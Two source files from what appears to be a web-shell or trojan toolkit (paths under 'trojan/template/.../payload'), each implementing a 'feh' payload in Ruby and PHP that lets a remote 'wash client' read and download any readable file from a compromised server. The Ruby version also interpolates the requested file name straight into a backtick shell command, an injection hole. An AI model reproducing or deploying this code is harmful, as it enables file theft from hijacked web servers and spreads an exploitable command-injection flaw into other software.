File: trojan/template/ruby/payload/feh.rb
def payload_feh json
    Dir.chdir @cwd
    img_file = json['args[file]'].first

    if File.readable? img_file
        mime_type = `file --mime-type -b #{img_file}`.strip!
        puts @cgi.header("Content-Type: #{mime_type}")
        puts File.read(img_file)
    else
        puts 'File does not exist.'
    end
    exit
end

File: trojan/template/php/payload/feh.php
<?php

/**
 * Downloads a file
 *
 * @param string $args             Arguments passed from the wash client
 */
public function payload_feh($args){
    # emulate directory persistence
    chdir($this->cwd);

    # if the requested file exists, serve it up to the user
    if(file_exists($args['file'])){
        # extract some image information
        $image_data = getimagesize($args['file']);
        header("Content-Type: {$image_data['mime']}");
        readfile($args['file']);
    }
    
    # if not, provide a notification
    else { echo "File does not exist."; }
    die();
}

?>
